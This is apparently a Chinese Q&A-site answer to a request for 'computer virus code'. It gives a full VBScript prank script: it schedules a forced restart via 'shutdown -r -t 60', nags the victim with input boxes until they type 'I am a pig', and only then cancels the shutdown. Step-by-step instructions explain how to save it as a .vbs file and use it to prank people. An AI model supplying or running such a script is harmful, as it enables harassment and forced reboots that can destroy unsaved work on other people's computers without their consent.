电脑病毒代码
ZHAOKUNYI
2024-12-01 14:25:36
最佳回答
多的 给你个**的玩on error resume next dim wshshella set wshshella = wscript.createobject("wscript.shell") wshshella.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分你机,不信,试··"" ",0 ,true dim a do while(a <> "我是猪") a = inputbox ("说我是猪,就机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"msgbox" loop msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛" dim wshshell set wshshell = wscript.createobject("wscript.shell") wshshell.run "cmd.exe /c shutdown -a",0 ,true msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾" 把这段复制,新建一个文本文档,粘贴进去,保存,然后右击,属性,将后缀由.txt改为.vbs 确定就行了!以后双击这个vbs文件就能捉弄人了 你想让他喊什么就改引号里的内容就行了! 20210311